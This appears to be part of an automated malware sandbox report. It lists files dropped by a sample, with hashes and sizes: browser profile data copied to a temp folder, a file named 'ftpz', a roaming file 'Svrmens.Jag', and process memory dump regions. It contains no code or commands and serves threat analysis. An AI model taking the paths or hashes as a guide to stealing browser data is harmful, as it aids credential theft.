5a16be44a01b79c0c062a2a5c1592d79d621291813848e3fd7f2fb2a1bbb9367e8e8dc0bae43fddab1da0008d2fb72108c685c98ac0ee737b910f6b016083433

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Session Storage\000003.log

Filesize
80B

MD5
69449520fd9c139c534e2970342c6bd8

SHA1
230fe369a09def748f8cc23ad70fd19ed8d1b885

SHA256
3f2e9648dfdb2ddb8e9d607e8802fef05afa447e17733dd3fd6d933e7ca49277

SHA512
ea34c39aea13b281a6067de20ad0cda84135e70c97db3cdd59e25e6536b19f7781e5fc0ca4a11c3618d43fc3bd3fbc120dd5c1c47821a248b8ad351f9f4e6367

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Session Storage\LOG

Filesize
263B

MD5
39a02c4c2da9d53c81ecf2f2b3096b63

SHA1
33ba78b342ad5de6ad71d244db5f5431baf76442

SHA256
99a9c1dc5e689585ab856fd617364fc7343f0020f0b14cb43366c0577c56016d

SHA512
e80f31ba0a7eba4813de4e9c4cf81d6af18f21b245167bdfc32319dc675b14ac8a9f3cf7a7f3a109ec8606f7b00f90d0f400853df472272e0188d2f480923658

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Site Characteristics Database\000003.log

Filesize
40B

MD5
148079685e25097536785f4536af014b

SHA1
c5ff5b1b69487a9dd4d244d11bbafa91708c1a41

SHA256
f096bc366a931fba656bdcd77b24af15a5f29fc53281a727c79f82c608ecfab8

SHA512
c2556034ea51abfbc172eb62ff11f5ac45c317f84f39d4b9e3ddbd0190da6ef7fa03fe63631b97ab806430442974a07f8e81b5f7dc52d9f2fcdc669adca8d91f

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Site Characteristics Database\LOG

Filesize
291B

MD5
c123e9eef45ca9c2f72caa323e62549c

SHA1
111833e28285182bcf189d3f824f228882bb860c

SHA256
788c2611b2bedcca1d373ed1ceaf5267ddf2f01d4f224a080c4325b6d7e0fa41

SHA512
16230d89f1fdbcd2084d16aa5ec524bdffda324e4f5103b39b7ebcba71d9bbb287d5944a054a7ef3a8e8fa44b9c0a84f45f37907c9eb6786341fce88aa4b6705

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Sync Data\LevelDB\000003.log

Filesize
46B

MD5
90881c9c26f29fca29815a08ba858544

SHA1
06fee974987b91d82c2839a4bb12991fa99e1bdd

SHA256
a2ca52e34b6138624ac2dd20349cde28482143b837db40a7f0fbda023077c26a

SHA512
15f7f8197b4fc46c4c5c2570fb1f6dd73cb125f9ee53dfa67f5a0d944543c5347bdab5cce95e91dd6c948c9023e23c7f9d76cff990e623178c92f8d49150a625

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Sync Data\LevelDB\LOG

Filesize
269B

MD5
3faa69573b755370e85ecc0ab55c6cd2

SHA1
70cc81973f71b06f750c7dbc0dc3bae933789383

SHA256
32bf40db2c557b7c4adb9582ef8c2478f3eb2816cc201a062d55c50fcc2aa936

SHA512
2dc801a40b67afb514f73dadefb5ae96f1a62509e1a4b19f2875c633e32648226b1d2e825536cb47312b6c9820ea7382de0e95329e5b856b5a76f70e7b0bfa81

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Top Sites

Filesize
20KB

MD5
986962efd2be05909f2aaded39b753a6

SHA1
657924eda5b9473c70cc359d06b6ca731f6a1170

SHA256
d5dddbb1fbb6bbf2f59b9d8e4347a31b6915f3529713cd39c0e0096cea4c4889

SHA512
e2f086f59c154ea8a30ca4fa9768a9c2eb29c0dc2fe9a6ed688839853d90a190475a072b6f7435fc4a1b7bc361895086d3071967384a7c366ce77c6771b70308

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Visited Links

Filesize
128KB

MD5
275b7ca20112aa5344e35bbba5e50c46

SHA1
b1cf190306a6f27a29c76d695f5ed47eca00cec3

SHA256
ed592b328dab2558266f972a5d99676ddfa1911da70edce982f58c322e684180

SHA512
a302a8e8f20687200def643ab9dc90ed6967caf3106ae2d75242f3e42118ee7e80fb8e7013cdd45de403f49c99c962917e3a59bf118b2c67d76da0ff83caa56a

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Web Data

Filesize
114KB

MD5
94d615a1f0426ada7229b58dd469b5f4

SHA1
3993265a087f8ab5f8b30cac1b00ffb118b12dd5

SHA256
5017fa7aaf74b395b2184d22448532709dbba2bf53010069ed45550d076d0f69

SHA512
816e4840570b60e522e0d82876783224f44fe12ba1108b1b4deb2fb9439d94d9bf1195dc16a5d2ca00666c1b8ecdd98201c2f4acf1bc6fb22e52131c4cfb4ad7

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\000003.log

Filesize
4KB

MD5
0e3bc6478871dc61f0e608311d6b5436

SHA1
57f105a037780d07c9d211b24e5cb1170558e732

SHA256
260bc322f211fd136b026e201934428cc7415f509324c2c3a827b16f56ca3345

SHA512
1f8e78be1393844468df8b80ccae8afcf5f9068472794b8beb9749dab3cffebcb27f10db58f7e70d63858ac9191b40b25b16122c8982ace89dc07c0e3c5b1827

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\LOG

Filesize
263B

MD5
82015480f2ac375ba6d209b0b1f269e8

SHA1
61f7c746dfbafa50b3010e6bae66d40f48346cdb

SHA256
1ee0d83569fff44636a554ab38c7cb50fabca2f6154d57f742eb7305e35c83ed

SHA512
8ea5c30696e45936054c1c6fa087af7d0a8429ea7e48447f861a5ff1ace00d78457466b56ffece27145d105bdd229b973d8fb311f7d0f072494dfaecca419d92

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\metadata\000003.log

Filesize
682B

MD5
728fd6cccd165838ac93fa9eb133a379

SHA1
854aa2828518cd94ed82fa8db1e47eb1abe7d7a6

SHA256
d3a3ab957e06952583b16ed0fd8c4bceeb01ca00c090878937a817b841195357

SHA512
ca5bc4749e925244ff3325d99296ee1168c456c7ab78c7b1b47cf0c5e18edbc22be23fa8956a05a6c68ca0ca15dcfe74f02dce40f3e2ed1c855c6738d1c244b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\metadata\LOG

Filesize
281B

MD5
9f545cffba9df45fd879a8fd29f30266

SHA1
555e1ea8b32fb8894cf689944e57a93ca2e3cfc2

SHA256
9afae51b16a0b60f24c4003051aff6728f675256ca73ea0fca74f9607ac5d3f8

SHA512
3054094194bb36eeeafca36aa113f19b3bcbc3ad0ed0ad15635d23cf965a6c1ab77144b8d3e59b4909f5c1ea910128f118e3bfebbdda5b5e5c5d7e1c23e18b3d

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_0

Filesize
8KB

MD5
cf89d16bb9107c631daabf0c0ee58efb

SHA1
3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b

SHA256
d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e

SHA512
8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_1

Filesize
264KB

MD5
d0d388f3865d0523e451d6ba0be34cc4

SHA1
8571c6a52aacc2747c048e3419e5657b74612995

SHA256
902f30c1fb0597d0734bc34b979ec5d131f8f39a4b71b338083821216ec8d61b

SHA512
376011d00de659eb6082a74e862cfac97a9bb508e0b740761505142e2d24ec1c30aa61efbc1c0dd08ff0f34734444de7f77dd90a6ca42b48a4c7fad5f0bddd17

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_2

Filesize
8KB

MD5
0962291d6d367570bee5454721c17e11

SHA1
59d10a893ef321a706a9255176761366115bedcb

SHA256
ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7

SHA512
f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_3

Filesize
8KB

MD5
41876349cb12d6db992f1309f22df3f0

SHA1
5cf26b3420fc0302cd0a71e8d029739b8765be27

SHA256
e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c

SHA512
e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Last Version

Filesize
11B

MD5
838a7b32aefb618130392bc7d006aa2e

SHA1
5159e0f18c9e68f0e75e2239875aa994847b8290

SHA256
ac3dd2221d90b09b795f1f72e72e4860342a4508fe336c4b822476eb25a55eaa

SHA512
9e350f0565cc726f66146838f9cebaaa38dd01892ffab9a45fe4f72e5be5459c0442e99107293a7c6f2412c71f668242c5e5a502124bc57cbf3b6ad8940cb3e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Local State

Filesize
8KB

MD5
2af620c2c139f5cd419e5a95f3ad7cce

SHA1
72386353d894c53257ee1a5e2808b6c886c9f9c5

SHA256
6a044186d30ad869ce07832132ab1e5fad0b615b6337cbf2181be20e128bd438

SHA512
7c1751b713fa3c5ee7a895f7dabc5c8f424569bf5aff1b239d063c4e224d6a10af9d67eee78a72da8707180cdf5942e45e2b9eb08f55ae61d35a36846aca5764

Download Submit
C:\Users\Admin\AppData\Local\Temp\TmpUserData\Local State

Filesize
116KB

MD5
7585b84ef1eeccfddd56ffa2e19a967f

SHA1
aba623b82627738b59229f528716ba0bcffc348f

SHA256
0111d4061fe083154073b1e417da16331558c5533a93cbdf6de03bc5dd74608f

SHA512
810fed5d074d7c0f31bfb9b87db8abd7621efbdb3f5dfde08837510c69bdc08a5b35550ed5ffd742b6dd41e94e5d1999f05079e30b7d8121f869b858bbc200d4

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_e0z33xxw.zat.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ftpz

Filesize
4KB

MD5
bc25ccf39db8626dc249529bcc8c5639

SHA1
3e9cbdb20a0970a3c13719a2f289d210cdcc9e1d

SHA256
b333f8c736c701bc826886f395d928731850cbce6db77be752b3cf7979114904

SHA512
9a546127bddc1d187e674cda82e6c5046cac7f3e6f9515aed68d5bff2264b9d679d857dd97270e10826cd11ce2d92d82dd7f9801e19027e346b60bcc814cca1a

Download Submit
C:\Users\Admin\AppData\Roaming\Svrmens.Jag

Filesize
472KB

MD5
446422fa7fea111877f8479983047645

SHA1
809d50b29798cc9fe183379389d98583d1ca71c4

SHA256
0cf981f2f27a017651d067e0864eb90e84b6b0dd02113e1aa82b19fd0337b4ee

SHA512
6060d17ba683b83060af3e01c4cce6bb99d20e9700b134bdf3bc11b884bdb26bb7120b95180acdc99f1cae956d7fdd9cc3d3e291648c4df522f11d58e4db6bef

Download Submit
\??\pipe\crashpad_2408_AYYDITYPJBDPEFIE

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/444-23-0x00007FFFF8850000-0x00007FFFF9311000-memory.dmp

Filesize
10.8MB

Download
memory/444-15-0x00007FFFF8850000-0x00007FFFF9311000-memory.dmp

Filesize
10.8MB

Download
memory/444-14-0x00000208FA560000-0x00000208FA582000-memory.dmp

Filesize
136KB

Download
memory/444-20-0x00007FFFF8850000-0x00007FFFF9311000-memory.dmp

Filesize
10.8MB

Download
memory/444-19-0x00007FFFF8853000-0x00007FFFF8855000-memory.dmp

Filesize
8KB

Download
memory/444-16-0x00007FFFF8850000-0x00007FFFF9311000-memory.dmp

Filesize
10.8MB

Download
memory/444-4-0x00007FFFF8853000-0x00007FFFF8855000-memory.dmp

Filesize
8KB

Download
memory/924-84-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/924-87-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/924-81-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2336-82-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2336-88-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2336-89-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2956-79-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2956-90-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2956-86-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2956-83-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/3208-61-0x0000000000C00000-0x0000000001E54000-memory.dmp

Filesize
18.3MB

Download
memory/3208-67-0x000000001FB10000-0x000000001FB44000-memory.dmp

Filesize
208KB

Download
memory/3208-212-0x0000000020430000-0x0000000020449000-memory.dmp

Filesize
100KB

Download
memory/3208-211-0x0000000020430000-0x0000000020449000-memory.dmp

Filesize
100KB

Download
memory/3208-208-0x0000000020430000-0x0000000020449000-memory.dmp

Filesize
100KB

Download
memory/3208-71-0x000000001FB10000-0x000000001FB44000-memory.dmp

Filesize
208KB

Download
memory/3208-70-0x000000001FB10000-0x000000001FB44000-memory.dmp

Filesize
208KB

Download
memory/5060-41-0x0000000006170000-0x00000000061BC000-memory.dmp

Filesize
304KB

Download
memory/5060-48-0x0000000008B70000-0x000000000A4E8000-memory.dmp

Filesize
25.5MB

Download
memory/5060-28-0x0000000005A50000-0x0000000005AB6000-memory.dmp

Filesize
408KB

Download
memory/5060-27-0x0000000005310000-0x0000000005376000-memory.dmp

Filesize
408KB

Download
memory/5060-26-0x0000000005260000-0x0000000005282000-memory.dmp

Filesize
136KB

Download
memory/5060-25-0x00000000053B0000-0x00000000059D8000-memory.dmp

Filesize
6.2MB

Download
memory/5060-24-0x0000000002800000-0x0000000002836000-memory.dmp

Filesize
216KB

Download
memory/5060-38-0x0000000005C40000-0x0000000005F94000-memory.dmp

Filesize
3.3MB

Download
memory/5060-40-0x0000000006120000-0x000000000613E000-memory.dmp

Filesize
120KB

Download
memory/5060-46-0x00000000085C0000-0x0000000008B64000-memory.dmp

Filesize
5.6MB

Download
memory/5060-42-0x0000000007990000-0x000000000800A000-memory.dmp

Filesize
6.5MB

Download
memory/5060-43-0x00000000066E0000-0x00000000066FA000-memory.dmp

Filesize
104KB

Download
memory/5060-44-0x00000000073F0000-0x0000000007486000-memory.dmp

Filesize
600KB

Download
memory/5060-45-0x0000000007350000-0x0000000007372000-memory.dmp

Filesize
136KB

Download